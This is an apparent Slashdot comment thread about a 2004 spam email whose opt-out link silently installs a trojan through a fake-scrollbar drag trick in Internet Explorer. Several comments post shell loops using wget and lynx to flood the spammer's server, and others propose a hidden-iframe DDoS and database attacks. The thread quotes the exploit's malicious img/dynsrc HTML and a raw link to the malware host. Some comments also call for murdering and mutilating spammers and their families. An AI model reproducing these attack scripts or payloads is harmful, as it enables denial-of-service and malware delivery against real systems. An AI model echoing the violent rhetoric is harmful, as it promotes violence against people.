IT Geeks - 1

Politicos without "tech savvy" - 0

Sending your rep a link to the site in a complaint about the CAN SPAM act - priceless

Javascript console

[saned]

Firefox's Javascript console reports many errors:

Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryivan ov&opt=hjj&rw=468&rh=60&cv=220&uid=673 475 Line: 3, Column: 17 Source Code: document.writeln('

Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1 &adtype=over&affiliate=ultimate-guitar&suba=ultima te-guitar&channel=music&subchannel=tic&category=ti c&PT=ct&CR=ei&pez=tic Line: 11

Error: document.getElementById("clientcall").click is not a function Source File: http://www.xcelent.biz/o/ Line: 74

Error: event is not defined Source File: http://www.xcelent.biz/o/frame.html Line: 84

...and many more similar to this
-P@

well then...

... time to send one of these babies to each legislator....

opt-out almost never works anyway

[donbrock]

Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings.

I've been getting spam for years that have an opt-out option. The only problem is that it almost never works. It's usually a bad link or it may just display a screen that says you've been removed but I believe it's a dummy screen to make you think you've been removed.

send it to the MCSE boys

[codepunk]

I just sent a link to that to the MCSE slags at work. How long till they figure out they just got owned.

Re:send it to the MCSE boys

They probably block all mail from you already - with a supercilious attitude like that you must be REAL unpopular..

Re:send it to the MCSE boys

Oh man you rock.

I'm sending that link to the MCSE guys in the NOC and the REgional IT center.

Dear It professionals, I fond this site that seems to try and entice users in our company to divulge information and or possibly infect our computers.

can you investigate and protect us?

Re:send it to the MCSE boys

[Maestro4k]

• I just sent a link to that to the MCSE slags at work. How long till they figure out they just got owned.

I predict about 5 minutes before they call security and 10 minutes before you get to clean out your desk and go home early. :)

Slightly OT-Malicious spam opt-outs and MYPOINTS

[CdBee]

I recenived an email from MyPoints asking me to activate an account set up on my Gmail address a few days ago, and hit the CAN-spam opt-out link (I hadn't signed up for it)

Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.

Has anyone else had the same thing happen?

Even better - choose a link with graphics on.

[cliveholloway]

After a little guessing:

a b c d. "d" looks pretty heavy on graphics.

.02

cLive ;-)

Re:Even better - choose a link with graphics on.

[tty21]

xcelent!! I think he's feeling the burn....

Re:Even better - choose a link with graphics on.

[Psychotext]

Excellent... server seems to be slowly cooking already. :)

Re:Even better - choose a link with graphics on.

[Coward+Anonymous]

Don't forget the good services of SSL.

You should use https for everything so that you get a b c d

Re:Even better - choose a link with graphics on.

[mod_parent_down]

Or, you could just go report spam. They do NOT tolerate ANY spam.

But they will need your email address.

Re:Even better - choose a link with graphics on.

[System.out.println()]

Does using https cost the server more bandwidth?

Re:Even better - choose a link with graphics on.

[bigjocker]

I'm hitting d like crazy with wget.

At last, a good use for these useless scripts I have to bother my friends :)

Re:Even better - choose a link with graphics on.

[nkh]

I'm sure you can be interested in this official windows update (39kb)

Re:Even better - choose a link with graphics on.

Please, do share your script. I am interested for, uh... acedemic reasons.

Re:Even better - choose a link with graphics on.

[Coward+Anonymous]

No, but, barring a HW accelerator, it increases CPU load considerably.

Re:Even better - choose a link with graphics on.

[rasz]

Four windows refreshing those links (ssl) working on full steam now.

Re:Even better - choose a link with graphics on.

I'm not the grandparent poster but this one will do the trick. It's unethical but we cant help but to get pissed off at assholes like these once in a while now do we? :P

#!/bin/sh
wget --mirror -erobots=off --user-agent=`mcookie` -np https://www.xcelent.biz/d/
find www.xcelent.biz/ -name *.jpg>urls
while [ true ]; do
for i in `cat urls`; do
wget --user-agent=`mcookie` -O tmp https://$i
rm tmp
sleep 1
done
done

Re:Even better - choose a link with graphics on.

Hmm, how about reporting the spam with the first 10,000 digits of pi as a parameter instead of your email address?

Re:Even better - choose a link with graphics on.

Use this link:

Re:Even better - choose a link with graphics on.

[abirdman]

Thank you AC! There are at least a dozen big graphics on that site. That should heat up their processors, and likely swallow some bandwidth as well. I adapted this a bit to D/L the exe as well, and it's running in text mode on a Linux box. This is the most fun I've had with my computer in a long time!

Well I went to look at the virus

[3terrabyte]

I thought it would be neat to see how good their fake-jpeg scrollbar was, so I loaded the page. I had no plans on 'scrolling down'.

Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.

Well that was fun. Didn't get to see any scroll bar :(

Windows 2000 - IE 5.50.4807.2300

Re:Well I went to look at the virus

[Naikrovek]

the scrollbar is the real IE scroll bar but there's an invisible image on top of it. When you click and drag you're actually dragging this image onto a small square that follows the mouse cursor - you can't avoid dropping it into that small image.

the js code scrolls the page for you, instead of the actual scroll bar. since you're scrolling the page (via javascript) the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.

as you learned, the code doesn't need to be executed to trip the anti-virus. oddly enough my corporate anti-virus didn't catch a thing (it didn't tell me it did anyway), and when i dropped, the empty .exe was installed.

I won't tell you where I work but I will tell you that its a place where you don't want viruses or spyware getting at the very personal data we have on 1:4 of you. You all opted-in for the data collection too. (very large insurance company) I will tell you that we're mandated to use IE and Outlook. Firefox installations will get anyone in this company in deep trouble - thanks SCO, for promoting fear of open source for your own selfish gain!

Why oh why

Why are spammers so malicious? Maybe they're terrorists (half-joking). Should someone who gains unauthorized entry to millions of citizens' computers, and who burdens the economic infrastructure (Internet) with garbage be considered perhaps a terrorist?

Re:Why oh why

[Oddly_Drac]

"Should someone who gains unauthorized entry to millions of citizens' computers, and who burdens the economic infrastructure (Internet) with garbage be considered perhaps a terrorist?"

I didn't see mention of 'arab' in there.

More seriously, doesn't this gel slightly with the windows Eula?

Re:Why oh why

Are all terrorists Arabs?

Re:Why oh why

[Oddly_Drac]

"Are all terrorists Arabs?"

Only if you work in Homeland Security

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

Only 10 million

Win32.Sokeven.D

[davidwr]

39,936 bytes
Added to Computer Associates database 9/21/04

What do other vendors call this?

Why is this a surprise?

[mykepredko]

Seriously.

It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way and they add it to their list of email addresses that actually respond to spam.

So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.

Users should always follow these simple instructions with regards to email spam:

1. Make sure you have an incoming mail spam filter, like SpamAsassin.
2. Delete any spam that gets through.
3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it.

myke

Re:Why is this a surprise?

[mdfst13]

"3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it."

If you are interested, buy from a competitor. Note that under your system, it still makes sense for a manufacturer (e.g. the makers of Cialis, Levitra, or herbal substitutes) to support spam (either directly or through dealer incentives). E.g. if someone spams you to buy Levitra, buy some Viagra instead.

Re:Why is this a surprise?

[HikeFanatic]

Ditto - I'm very surprised that this exploit hasn't been utilized earlier, considering the large number of people who go ahead and click on the so-called "opt-out" links. This in spite of the advise not to do so. I've already been telling my family to just delete the email.

All it does is verify your email address for spammers. I just delete what SpamAssassin doesn't get rid of.

Re:Why is this a surprise?

Delete any spam that gets through.

I've actually been saving all my spam since like 1995 or so. One day I'm hoping for payback in the form of legal action against all these dipshits.

Re:Why is this a surprise?

[crawling_chaos]

You are assuming of course that what they are selling is actually Levitra or Cialis. Considering that at least 10% of the worldwide drug market is counterfeit, and that percentages can be as high as 60% in countries without strong drug regulators, you are more likely getting relabeled asprin or a sugar pill.

Re:Why is this a surprise?

[Maestro4k]

• Seriously.

  It's not like spammers are a class of people to be trusted.

I submitted the article and I can honestly say it isn't a surprise. It's newsworthy though because it shows a new vulnerability and one that's far easier to trick your average Windows luser into following. I really liked how The Reg really slammed the politicians and in one lovely sentence made utter fools out of them and their whole approach to spam. I suspect that we'll be hearing their take, or something very similar next time Congress decides to act on the spam problem again.

What's really great is this little exploit and the way it's done really is going to take the wind out of the sails of the Direct Marketing Association. It's going to be hard to defend the practice of sending mails unless explicitely opted-in from now thanks to a spammer/virus writer. It should also make it clear to everyone the huge difference between junk mail (postal) and spam. Junk mail doesn't come with bombs that go off and destroy your mailbox when it arrives.

Re:Why is this a surprise?

[slappyjack]

It's newsworthy though because it shows a new vulnerability and one that's far easier to trick your average Windows luser into following

OK, the vulnerability is newsworthy, but yet another example of the behaviors of the drool-and-click crowd is just plain redundant. We KNOW they,re stupid. Hell, THEY know they're stupid - they're just too lazy to care.

Even better, this kind of thing makes some nice coin for people who go out and clean up winbdows machines for $20 an hour.

(Really, after this past year, friends get exactly ONE free checkup, then it costs them. Of course, the frend rate is payable in beers.)

Re:Opt out now

Mod down link whoring troll. Take your spam somewhere else, ya douche! And don't come crying to us when they don't give you your free crap.

Why?

[crotherm]

Why, exactly, is anybody reading SPAM? It is not like you cannot tell just by looking at the subject and the From line.

Secondly, why are people viewing emails as anything but text?

Re:Why?

[WormholeFiend]

by default, the most popular email clients have HTML turned on, and the majority of people don't know you can view emails as text only, not to mention how to deactivate HTML email.

Re:Why?

I've had a huge influx of spam recently with subject lines like "meeting thursday at 4". I was about to delete one of them when I noticed it was not spam - but a real message with a subject line that just looked like spam.

Re:Why?

Even with thunderbird (at least the version that i have) it loads the images on selecting a new mail. Ans since i have to select every mail to rate them junk, it will load every image, thus give my mail address away to every spammer.....

I guess i'm using a old version of thunderbird...

Re:Why?

[crotherm]

Simple, don't have a message pane. On mine I have to double click an email to view it. It might be a pain in the arse, but it is safer.

Also with thunderbird, you can chose not to load pictures if they are remotely hosted.

Re:Why?

[xouumalperxe]

not wanting to be a Microsoft supporter here, but for the record, outlook (not sure about express) does that no-pic thing as well

We need a productive exploit of this!

What we need is a productive exploit of this. Here's how it works.

Create a small .exe that pops up a window on the users machine the next time they reboot (this is how the exploit works).

This .exe gets installed when they drag on any image that has the exploit tag added. These images can be added all over the web to lots and lots of websites.

The user visits the site, clicks the image, the program gets installed, and the next time they reboot they get a very real looking message from Microsoft advising them to install Firefox because Internet Explorer is being abandoned as a non-profitable product.

Voila', we've done them all a favor and patched their machines for them.

The .exe could actually run every time the person's computer is rebooted, but only shows itself when the person doesn't have Firefox installed.

It could also remap any IE shortcuts to Firefox...

Hasn't this always been the case?

[merlin_jim]

You click the opt-out link, bad things happen. Before it was even more spam, now it's malicious attacks.

How many people really trust spammers to honor an opt-out?

Best port for a Slashdotting

It is so much better to unsubscribe from this spam using the ssl connection (443). I checked, and it presents the same exploit page as the port 80 page with the benifit (for us) that it requires the extra computational resources of setting up an ssl session. Use the FOX and update often! https://61.218.79.53/o/

MOD PARENT (with malicious address) DOWN!

[kabloom]

This is dangerous stuff. Mod the parent article down (which includes a working link to the malicious address) so that people don't click on it.

Re:MOD PARENT (with malicious address) DOWN!

[FatSean]

F that...if you read slashdot you should be smart enough to heed the warning. If you aren't, you get what's coming to you.

Thanks anyway Mommy!

Re:MOD PARENT (with malicious address) DOWN!

[darc]

Security via obscurity your thing? It makes no sense to hide stuff that can hurt you, rather than to be able to TELL what might. Your ostrich defense isn't very effective.

Wrong on so many counts

SPAM Proposal Rejection Form

This article advocates a

( ) technical (x) legislative ( ) market-based ( ) vigilante

approach to fighting spam. Your idea will not work. Here is why it won't work.
(One or more of the following may apply to your particular idea, and it may
have other flaws which used to vary from state to state before a bad federal
law was passed.)

( ) Spammers can easily use it to harvest email addresses
(x) Mailing lists and other legitimate email uses would be affected
(x) No one will be able to find the guy or collect the money
( ) It is defenseless against brute force attacks
(x) It will stop spam for two weeks and then we'll be stuck with it
(x) Users of email will not put up with it
( ) Microsoft will not put up with it
( ) The police will not put up with it
(x) Requires too much cooperation from spammers
(x) Requires immediate total cooperation from everybody at once
( ) Many email users cannot afford to lose business or alienate potential employers
( ) Spammers don't care about invalid addresses in their lists
( ) Anyone could anonymously destroy anyone else's career or business

Specifically, your plan fails to account for

( ) Laws expressly prohibiting it
(x) Lack of centrally controlling authority for email
(x) Open relays in foreign countries
( ) Ease of searching tiny alphanumeric address space of all email addresses
( ) Asshats
(x) Jurisdictional problems
(x) Unpopularity of weird new taxes
( ) Public reluctance to accept weird new forms of money
( ) Huge existing software investment in SMTP
( ) Susceptibility of protocols other than SMTP to attack
( ) Willingness of users to install OS patches received by email
(x) Armies of worm riddled broadband-connected Windows boxes
( ) Eternal arms race involved in all filtering approaches
( ) Extreme profitability of spam
(x) Joe jobs and/or identity theft
( ) Technically illiterate politicians
( ) Extreme stupidity on the part of people who do business with spammers
(x) Dishonesty on the part of spammers themselves
( ) Bandwidth costs that are unaffected by client filtering
( ) Outlook

and the following philosophical objections may also apply:

(x) Ideas similar to yours are easy to come up with, yet none have ever been shown practical
( ) Any scheme based on opt-out is unacceptable
( ) SMTP headers should not be the subject of legislation
( ) Blacklists suck
( ) Whitelists suck
( ) We should be able to talk about Viagra without being censored
( ) Countermeasures should not involve wire fraud or credit card fraud
( ) Countermeasures should not involve sabotage of public networks
(x) Countermeasures must work if phased in gradually
(x) Sending email should be free
( ) Why should we have to trust you and your servers?
( ) Incompatiblity with open source or open source licenses
( ) Feel-good measures do nothing to solve the problem
( ) Temporary/one-time email addresses are cumbersome
(x) I don't want the government reading my email
(x) Killing them that way is not slow and painful enough

Furthermore, this is what I think about you:

( ) Sorry dude, but I don't think it would work.
( ) This is a stupid idea, and you're a stupid person for suggesting it.
(x) You are a spammer

Other sites on same server doing the same thing.

[Chatmag]

There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

But then again . . .

[harley_frog]

it is a site worthy of a good slashdotting, if just to keep the unwary from reaching it.

Re:But then again . . .

[mdfst13]

http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

P.S. Still be careful. They could always move the pages around.

Re:But then again . . .

[darkain]

i dunno bout anyone else, but i cant even resolve the DNS. not sure if it was removed completely already, or my ISP is just trying to be ahead of the game (for once in their life)

Ready for FUD against public bug lists

[kabloom]

Great. Now someone will use this as FUD against public security alert email lists.

YARTNUIE

[Ghengis]

Yet
Another
Reason
To
Not
Use
Internet
Expl orer.

Hazardous link

[abb3w]

Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

Re:Hazardous link

[Enoch+Zembecowicz]

Just doing my part... #!/bin/bash while true; do wget http://www.xcelent.biz/o/windows-update32.exe rm windows-update32.exe done

Re:Hazardous link

[Enoch+Zembecowicz]

Damned need for html.. #!/bin/bash
while true;
do
wget http://www.xcelent.biz/o/windows-update32.exe
rm windows-update32.exe
done

Re:Hazardous link

[Abalamahalamatandra]

You know, if MS /really/ wanted to make SP2 do the right thing, you'd think they would have put in a service to monitor all the regkeys/win.ini/whatever points that software gets autorun, and then scream loudly and ask for confirmation when something tries to use them.

Re:Hazardous link

[ocelotbob]

#!/bin/bash
while true;
do
lynx -dump http://www.xcelent.biz/o/windows-update32.exe > /dev/null
done

Why sully your hard drive with a copy of this file?

Re:Hazardous link

[xouumalperxe]

that'd be FAR too cumbersome for Joe User (and plain annoying for the hacker as well). And there ARE 3rd party programs that DO fish for all autorun spots of the registry and list the "offenders". It's not like MS has to do everything. They're just a bunch, compared to us lot ;)

Re:Hazardous link

[BillX]

It would be nice though, if MS at least documented ALL the startup locations, preferably in a big file named "All The Possible Start-Up Locations For Win[2000]" (etc.)

It started simple enough; there were the CurrentVersion\Run , \RunServices and a few similar keys we all know and love, all lined up in a row.

Then new Windowses start coming out with more Registry keys that can load malicious code on startup. Once people were diligently monitoring Run and RunServices, the malware vendors discovered ShellServiceObjectDelayLoad...now that's diligently monitored (by a select few), but wait....what are we up to now? CurrentControlSet\Control\SafeBoot\ ?

That's a new one to me. What auto-crap-loading key will they discover next?

Re:Hazardous link

Hey, why can I still download this thing? Would someone please hack that server and replace the file with a Goatse immage?

Re:Hazardous link

Yes that works! I think I'll leave that loop running tonight - see whether /dev/null ever gets full... ;-)

Can't someone sue

[fsterman]

There is an actual company backing this spam and website, couldn't someone sue for damages?

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

Has anyone else had the same thing happen?

Since most /. readers are smart enough not to use an opt-out link in spam (and prove to the spammer that the spam is actually read) I doubt if many /. readers have this problem.

Of course there's always a stupid person or two that uses opt-out links on spam...

Justifiable homicide?

[www.sorehands.com]

If you are caught killing a spammer, get a jury that has e-mail -- they will never convict.

Re:Justifiable homicide?

agreed. I wish there was a law to kill spammers in America. Would be nice. As it is you can't bribe people very well there.

I think every spammer should be shot, reshot, and tossed to the side of a road like a dead clown.

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

Well, I work there, so...

No, I can't really conceive of that happening unless it wasn't an e-mail from us. I can definitely testify that, getting mail from them on my hotmail account, they send 4-5 pieces of mail a day on average. But I have talked to enough people on my floor that are concerned with unintentionally sending spam that they aggressively make sure they have their backs covered.

Probably not the answer you were looking for, but that's how I see things from here.

Refresh Every Minute

The url you want to hit to DDOS this is:
http://www.xcelent.biz/d/

It's heavy in images.

There used to be a Firefox extension that you could use to refresh a page every N minutes, anyone know what that was?

If enough people set this to refresh every 1 minute, and left if open all day, this server would just cease to exist.

Since this same machine is FULL of spam and malicious sites:
http://whois.webhosting.info/61.218.79.53

This seems like a good idea...

Re:Refresh Every Minute

[inode_buddha]

You could just wget it all into /dev/null inside a while loop; wget exits and returns 0 which triggers the loop again. Maybe not a great idea to do that from your own IP tho, just on case.

Re:Refresh Every Minute

[terrencefw]

Yeah cool... lets set up a coral link so we all get a chance!

Re:Refresh Every Minute

This works:
$ while true;
do
lynx -dump http://www.xcelent.biz/o/windows-update32.exe > /dev/null
done

I'll just leave it running over night...

How about?

[phorm]

How about creating a new DB? Some mySQL exploits?

We could populate that sucker with crap records for eternity and fill his HDD...

I can't do it right now because I'm at work... how about somebody with 'leet mySQL hacking skills that's at home right now?

Re:How about?

This seems the most obvious one.

Blocked..

[LaPistola]

"Request blocked by WebBlocker" Thanks for the heads-up /.! Now none of our users will be affected.. no matter what the browser :)

Quick .EXE Analysis

[terrencefw]

As one other poster pointed out, running 'strings' on the executable reveals itself it be 'xProxyBot'.

Some other strings give a few clues about what it does:

• Software\Microsoft\Windows\CurrentVersion\Run - It installs itself in the registry.
• Mozilla/4.0 (compatible) - It grabs stuff of the web and tries to look like IE in the logs.
• SYSTEM\CurrentControlSet\Control\SafeBoot - Tries to get started in safe mode too.

It installs itself in Software\Microsoft\Windows\CurrentVersion\Run as 'w32.exe'. I don't see it doing very much though. I've let it loose on a VMWare '98 session. No opened ports (unless it responds to portknocking), no attempts at outbound communication, maybe '98 is too old for it!

I just got exploited

[iMaple]

I decided to try it out on my Windows machine, so opened the link in IE. I had Win XP SP2 and an updated Norton Antivirus and the (new ) Win XP firewall on.
But the exploit worked !! I was expecting to get a pop up from NAV with an exciting alarm sound .
(Un)Fortunately since it worked now I know what it does :
1) Add thw windows-update.exe in the startup folder
2) Add a new file cmd.dat to the startup folder.
Anyway since I had gone so far, I tried running the Windows-udpadte , but that gave me the error that it was not a valid exe file. I ran it in the protected moded (available when u slecet run as.. in Win XP). Then I renamed the dat file to .exe and ran that in the protected mode too. It ran !! It tried to access the internet but I hope the WinXP 2 firewall stoppped it. Anyway got sort of scared since my Win Laptop is not junk and I use it whenever I need a Laptop with standby and Powerpoint. So now I have deleted the files. Cant see any new services in the registry either so hopefully my machine isnt yet a spam mail relay.
BTW if anyone else has tried it out and know about something else that should be done pls let me know. And does anyone have a clue why NAV does not detect this ?? Maybe u need to activate it for IE or make IE the default browser ???

Re:I just got exploited

because norton is CRAP.

do a search on Google for antivir. download it install it update it.

Now you have a FREE antivirus porgram that is better ,faster and certianly more up to date than Nroton.

only fools use norton afte rknowing about antiVir.

Re:I just got exploited

Wrap your machine in black plastic and then burn it.

It's the only way to be sure.

Re:I just got exploited

[Kreigaffe]

No no no no no no... Nuke from orbit.. THAT'S the only way to be sure

The Final Solution to Spam

[cryptochrome]

Flash Lynch Mobs.

Campaign contributions?

[samberdoo]

Has anyone ever documented how much spammers contribute to politicians campaigns? They certainly have been effective in keeping significant legislation from being passed and significant enforcement from taking place.

Re:Campaign contributions?

There have been campaign contributions associated with stifling anti-spam legislation, but they do not come from the spammers themselves; they come from the direct marketing association and companies like Microsoft that (rightfully or wrongfully) fear that legislation written by technically illiterate lawmakers could affect them.

The truth is that the worst spam comes from fly by night operations too small to be on the radar of any congressman. If somehow, we could have legislation targetted at them exclusively, we might be able to get some laws.

Re:Campaign contributions?

[ocelotbob]

The problem with these guys is that their site's in china and thus difficult to trace who's really financing them. Much like those coolwebsearch shitbags who are in russia. International boundaries make it unfortunately hard to trace who owns what.

Your sig

[System.out.println()]

I thought it was "gang aft agley"?

No it hasn't, MOD TROLL

[cliveholloway]

view page source (not frame source).

cLive ;-)

Disable Javascript and Java

[bradbury]

Duh... How stupid do you want to present yourself as? You are having foreign code executing on your computer. How many friggin computers infected does this need to present a problem for before people get a clue?

Bottom line: EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability). Until then they don't trust their own code and neither should you.

Disclosure -- there are extensive other hazards being exploited by SPAMers, etc which involve executable programs that may be communicated via email. People should be aware of them. Perhaps the best diagnosis and intervention in this situation would be -- if you are running Windows? Don't.

Re:Disable Javascript and Java

Yeah Sure:

-------------
EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability). Until then they don't trust their own code and neither should you.
-------------

Problem 1 = Joe Sixpack runs an insecure system
Problem 2 = Joe Sixpack Doesn't know what (...enter ANY computer term here...) is anyway....
Problem 3 = Joe Sicpack clicks when it says 'click here'
problem 4 = 90% of the world = Joe Sixpack

Perfect DDOS

[DigitalRaptor]

Here is the perfect way to DDOS a site like this... Pick a non-malicious, graphics intensive site on the same server: http://www.xcelent.biz/d/ If you have a website, particularly a high traffic one, add a 1 x 1 IFRAME to your site that loads their site. Now, everyone that comes to your site loads their site. The best part is, your IP and URL never show up in their logs. With only a few high traffic sites doing this, I'm not sure how their server could survive. And if it did, their bandwidth bill certainly would not.

Re:Perfect DDOS

[ocelotbob]

Your domain/IP does show up in the logs though. Every HTTP request has a referrer field which is used to track these things -- it's how hotlink blocking and stuff works.

Re:6 free gmail invites lastmeasure@gmail.com

Go ahead, spam me. Gmail has some of the best spam filternig out there.

P.S., its great to see Slashbots show their hypocrisy - they don't like spam themselves but they are happy to try (and fail) to subject other people to it.

Secure Server

[iMaple]

Since xcelent.biz is in the news I decided that it would be a reliable place to place an order for Viagara.

So went to their order site : Order Viagara and here is what they claim
This is a SECURE server and your personal and credit card information is protected.
Now if they have a certificate then I thought they would be easily tracable, but unbeliveably the server was not secure ( I mean their server could be secured and stored in the darkest dungeons but they did not use https ). Now that gives us all a really cool incentive for using Firefox 1.0 (it shows a lock in the address bar for secured site. Of course I am still ging to stick around with IE, the automated install is simple awesome, just scroll down and you are done, no clicking on pesky warning messages and shit.

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

[JimDabell]

Next time, give them an email address of username+mypoints@google.com. That way, if spam comes in, you'll be able to tell whether or not mypoints were the people that sent it or sold the address to spammers.

Can't we just deal with this already

[gelfling]

I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

I figure 10, 20 thousand of these losers tops and the problem will go away.

Re:Can't we just deal with this already

[sapped]

Can't we just deal with this already (Score:2, Interesting)
by gelfling (6534) Neutral on 2004.09.22 12:06 (#10319989) ( http://slashdot.org/ )

I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

I figure 10, 20 thousand of these losers tops and the problem will go away.

This is marked as interesting? Wow.

Re:Can't we just deal with this already

[Maestro4k]

• I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

  I figure 10, 20 thousand of these losers tops and the problem will go away.

While I appreciate the sentiment (personally I'm thinking boiling oil would be appropriate for spammers) I doubt it'd help. Even with the death penalty in the US we still have far far too many murders/rapes/etc. so it doesn't seem to work as a deterrent. All we'd end up with is lots of dead spammers (good) but plenty more rushing to take their places (bad). Just look at the meth problem, last night on the news we heard that the county sheriff in one of the nearby counties ended up busting his wife's cousin for cooking meth. People just get greedy and completely overlook the possible consequences. We're not going to be able to stop these problems with laws or conventional punishments.

That said we need to find a way to make spam stop paying. If there's no money in it, or it gets to where it's a near certainty you'll lose all you made (and then some) from hefty fines people will move on to something else to try to make a quick buck.

Re:Can't we just deal with this already

[slappyjack]

Even with the death penalty in the US we still have far far too many murders/rapes/etc. so it doesn't seem to work as a deterrent.

Maybe thats because we don't actually apply the death penalty in most cases. Telling someone that you're going to punish them will act as a deterrent only if you DO punish them.

I'm just saying.

Test new Spamassasin 3.0.0 against this!

[Chuck+Bucket]

If SA 3.0 is running with SUBL support, how can we add: www.xcelent.biz to the SUBL list? In that case, SA 3.0 would block this email alltogether. I think this is a killer feature of SA now, and I'm waiting to learn more about it so I can update my current 2.x version running on my home mailserver.

PCB$@#

Re:Test new Spamassasin 3.0.0 against this!

[Thng]

I checked it this morning, and surbl.org lists that URL as blocked.

Go check it here

BWHAHAHAHA!

Honestly, if you "surf" the web these days with:

1) Flash
2) Java
3) Javascript

You are simply asking for an anal reaming. The answer is to use a "secure" browser for common everyday browsing, which will display html and pictures. No cookies, flash, java, or javascript.

And then use a second browser and copy/paste the url when you need more functionality.

Re:BWHAHAHAHA!

[dead+sun]

Nope, with recent exploits against graphics rendering libraries that's not even safe.

Time to fire up lynx.

Good thing I use Macs and Linux then...

[Cybertect]

I don't have to worry about Windows viruses *and* fake scroll-bars will stick out like sore thumbs :)

And people say ICANN is worthless...

[miu]

By creating the .biz TLD they created a shyster scum ghetto I can easily ignore.

Thank you ICANN! :)

Better Port to Slashdot

We probably cannot bring it down using the 80 link, but the SSL link will peg the spammer's CPU without much effort on our part.

**********HAZARDOUS LINK****************
This is the link to the page. DO NOT CLICK on this if you are running IE.

https://61.218.79.53/

Re:wget

i've added the 10000 digits of pi link as a referer to my wget of d, should help with the log filling and bandwidth at the same time

Spam 'opt outs' are only used by spammers to...

[Assmasher]

...verify that your e-mail is valid.

Never reply to an opt-out even if running a secure e-mail application.

Re:MOD GRANDPARENT (with inocuous address) UP.

Are people on /. really still both

1. using IE for anything!?!
2. not updating antivirus definitions (or apt-get upgrade or equivalent) to keep up-to-date on security patches!?!

_and_ clicking on active-x controls in those windows!?!

I can't imagine this would be dangerous for anyone here.

I block all .biz

[emptybody]

what, you dont have a .com?
get over it.

Simple really...

[johannesg]

They hired Slashdot to take it down, and we are working on it even as I type this.

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

[ricotest]

My knowledge of RFCs is a little sketchy. Am I right in saying that if you use (in my case) richardjharris+mypoints@gmail.com, the email still gets through but has a different To: header? That would be ideal... except for the fact I'd still get spam. But it'd be ideal on one of my junk accounts.

Re:MOD GRANDPARENT (with inocuous address) UP.

_and_ clicking on active-x controls in those windows!?!

The point is this exploit doesn't ask you if you wish to download the problem code, it does it without asking. Are you really so Naive that you think all the spyware/adware/virus comes from people clicking "ok" to those confirmation boxes?

Are you really that confident that you AV software is working? Would you tell a bad guy its OK to shoot you because you are wearing a Kevlar vest?

Oh yeah, you've passed all the tests you mentioned, yet are still too dumb/lazy to remove the space the author told you he inserted on your own.

Dang it, where's the "-1 Bitch Slap" mod when you need it?

MOD PARENT DOWN!

[temojen]

MOD PARENT DOWN!

That link just (after a few steps) sends you back to the trojan.

Re:MOD PARENT DOWN!

But not automatically, right? The link itself goes to a CGI script that eventually redirects to a static, non-trojaned page. If you need explanation that you shouldn't go to a trojaned site with IE and then navigate around, you don't need moderators, you need a Darwin Award.

Opt out?

[killua]

the entire idea sounds good in theory, but in practice it doesnt even touch the problem at hand. Also on that same note, it was only a matter of time before someone discovered that they can trick users *gasp* into clicking opt out for a few nasty suprises.

Opt Out Sux

[Nom+du+Keyboard]

Opt out sucks. It has always sucked. It continues to suck. It will always suck.

Lawmakers, get a clue!

Firefox and Linux

After entering my Email address (NiceTry@sshole.com), I was releived to see that my name had been taken off their list:

Your email address has been removed from our database.

Anyway, here's a piece of the code:

<img id="dyn" dynsrc="./windows-update32.exe" border="0" style="filter:alpha(opacity=0);z-index:10;width:30 px;height:100%;position:absolute;padding: 0px 0px 0px 0px;right:0px;top:0;" onDragStart="startDrag();" onDragEnd="endDrag();" onClick="startClick()">

Opt-In Email Lists Are Best

Opt-In Email Lists Are Best!
You can get a free open-source one at:
http://www.technobreeze.com/php/emaillist/

Err...no

[kolly+kibber]

The requirement is that they have a link to opt out. There is a link to opt out.

Wow, you mindlessly repeated the mistaken conclusion of the article submitter.

If the link doesn't allow you to opt out, it's not an opt out link, is it?

